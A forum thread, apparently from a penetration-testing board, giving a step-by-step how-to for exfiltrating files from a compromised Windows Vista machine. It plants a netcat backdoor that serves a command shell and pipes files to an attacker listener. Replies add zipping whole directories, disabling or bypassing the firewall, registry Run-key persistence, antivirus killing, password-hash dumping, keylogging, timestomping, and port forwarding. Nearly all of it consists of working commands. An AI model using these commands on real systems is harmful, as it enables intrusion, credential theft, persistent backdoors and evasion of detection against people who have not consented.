Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: How to transfer files from vista to BT3 after exploitation

  1. #1
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default How to transfer files from vista to BT3 after exploitation

    This 'Howto' is written to explain post-exploitation file-transfers from vista box to BT3 box.
    This process doesn't work if the windows firewall is on. Somebody has to research and find a way to turn it off during the meterpreter session.

    I'm assuming that:
    1) You are testing this with your own machines or you have permission to penetrate the vista box.
    2) You've already got a meterpreter session running. If not, may be this one can help: http://forums.remote-exploit.org/showthread.php?t=19129
    3) You've downloaded nc (netcat) for windows. If not, download: http://joncraton.org/media/files/nc111nt.zip
    4) You've downloaded psexec.exe to execute process remotely. If not, download: http://download.sysinternals.com/Files/PsTools.zip

    Now, we've got our tools. Let's start with uploading the required files. They can be uploaded to the root folder or make a new folder by mkdir command. Say, we like to upload our files in c:\xxx folder of the victim (vista) box. So, go to c drive & prepare the folder.
    Code:
    cd c:\
    mkdir xxx
    ls
    cd xxx
    The ls will show you that the folder has been created.
    Open root directory of BT3 box and unzip the nc111nt.zip & PsTools.zip files.

    Uploading the files
    We just need 2 files. Upload them:
    Code:
    upload /root/nc111nt/nc.exe nc.exe
    upload /root/PsTools/psexec.exe psexec.exe
    ls
    The ls will show you that the files have been uploaded.

    Opening the backdoor
    Open a command shell by entering this on meterpreter field:
    Code:
    execute -f cmd.exe -c -H -i
    Run nc & keep it running (that's our backdoor) to keep 8888 port open:
    Code:
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
    Here, username & password are admin username & password of vista box. You should already know this (coz you own the box, don't you). In the real world, it's possible to crack these but this is not covered in this tut.

    Using backdoor to transfer file
    OK...now as we've got our door, you can press Ctrl+C to terminate command shell & then type exit to close meterpreter session. Open a fresh konsole & use telnet to connect to the victim anytime:
    Code:
    telnet 192.168.x.x 8888
    Here 192.168.x.x is victim's IP address. In my case, it's 192.168.1.2

    You should see:
    Trying 192.168.1.2...
    Connected to 192.168.1.2.
    Escape character is '^]'.
    Microsoft Windows [Version 6.0.6001]
    Copyright (c) 2006 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>
    We will call this "Shell"

    Files can be transferred from any location of vista box to any location in the BT3 box as long as correct file path is provided.
    To receive the xxxx.txt file in BT3 box to yyyy directory in root, first prepare BT3 box. Open another konsole & enter:
    Code:
    nc  -vv -l -p 10000 > /root/yyyy/xxxx.txt
    Now, to send the file from zzzz folder within C drive of Vista Box, go to the "Shell", & enter:
    Code:
    nc 192.168.y.y 10000 < C:\zzzz\xxxx.txt
    Here, 192.168.y.y is BT3 box (attacker) IP address.

    The file should be downloaded to desired folder.
    ENJOY!!!!!!!!!!




    Reference:
    http://linux.byexamples.com/archives...e-with-netcat/
    http://forums.remote-exploit.org/showthread.php?t=20858

  2. #2
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    3

    Default

    Thanks verry good tutorial

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by X-Ray Cat View Post
    Thanks verry good tutorial
    You are most welcome. I posted this tut a while ago and didn't get any response at all, so assumed that I did something sh*tty.

  4. #4
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    4

    Default

    I usually use the TFTP server to download or upload file in the victim machine.
    I wanna know how to download not only a file from a victim machine but a directory using the netcat or the TFTP server.
    If it is possible, please tell me how.

  5. #5
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by s@my_ View Post
    I usually use the TFTP server to download or upload file in the victim machine.
    I wanna know how to download not only a file from a victim machine but a directory using the netcat or the TFTP server.
    If it is possible, please tell me how.
    Well, there may be other ways, but I like to do it as follow:
    1. download PKZIP 2.04 (93.02.01) PKZIP.EXE (42 KB) from http://www.uv.tietgen.dk/staff/mlha/Download/dos/
    2. Upload it to xxx folder in victim box
      Code:
      upload /root/pkzip.exe pkzip.exe
    3. Then if your purpose is to download "test" folder from victim box compress it to make a zip file:
      Code:
      pkzip.exe test.zip c:\test\*.*
    4. Then just follow the file transfer procedure to download it to BT box.


    Hope that it's clear....

  6. #6
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    4

    Default

    Very clear, thank u kazalku for this solution.
    [COLOR="Red"]Tomorrow Can Be Too Late[/COLOR]

  7. #7
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Glad to be of help

  8. #8
    Member
    Join Date
    Jun 2008
    Posts
    101

    Default Bypassing Firewall

    Let's add some more ingredients to the soup.

    In case a windows firewall is in place, we can do the following to bypass it:

    Code:
    C:\>netsh firewall set allowedprogram %systemroot%\system32\nc.exe
    In this case, nc.exe was placed in the system32 directory. You can also disable the firewall altogether as well as opening particular ports. Try the help menu which is really good!

    Code:
    netsh firewall set /?
    Enjoy!
    QuadCore AMD Phenon X4 9950, 2600 MHz
    8GB DDR2 800MHz
    Dual Boot System: Windows Server 2008 x64 w/ Hyper-V, Ubuntu 9.10 x64

  9. #9
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    I was too lazy to add this........
    Cheers mate
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  10. #10

    Default

    hi,

    just curious, you have already exploited the box with msf3 - so just a stupid question, but why not using msf3 to transfer files and using a reverse shell/portfwd to avoid firewall issues (of course if you don't wanna have an additional backdoor with nc)?


    some nifty other things to do on the (wind0ws) target:

    meterpreter > use priv <<<<needed for timestomp & hashdump
    meterpreter > run getgui
    meterpreter > run killav
    meterpreter > run winemun
    meterpreter > hashdump
    meterpreter > ps <<<<get a list of running processes which could be then used for the migrate command

    using the keylogger function (you have to look for the winlogon.exe process id and migrate your session to this id)
    meterpreter > migrate {winlogon.exe process id}
    meterpreter > keyscan_start <<<<no you have to wait that user logins and types in someting..
    meterpreter > keyscan_dump

    manipulating firewall is also possible with the msf3 reg inbuilt function:

    meterpreter > reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v nc -d "C:\Windows\system32\nc.exe:*:Enabled:nc"

    if you don't wanna use psexec, you can also use mfs3 do this:

    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 8888 -e cmd.exe"

    changing file times is also not a bad thing to do:

    meterpreter > timestomp C:\\windows\\system32\\nc.exe -f C:\\windows\\system32\\cmd.exe

    if you don't wanna to the extra step to upload netcat - just use the msf3 port forwarding:

    meterpreter> portfwd -a -L 127.0.0.1 -l 446 -h schaeuble.bnd.de -p 3389
    ;-))


    Great scripts for msf3 can be found here:
    hxxp://www[.]darkoperator[.]com/meterpreter/


    /brtw2003

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •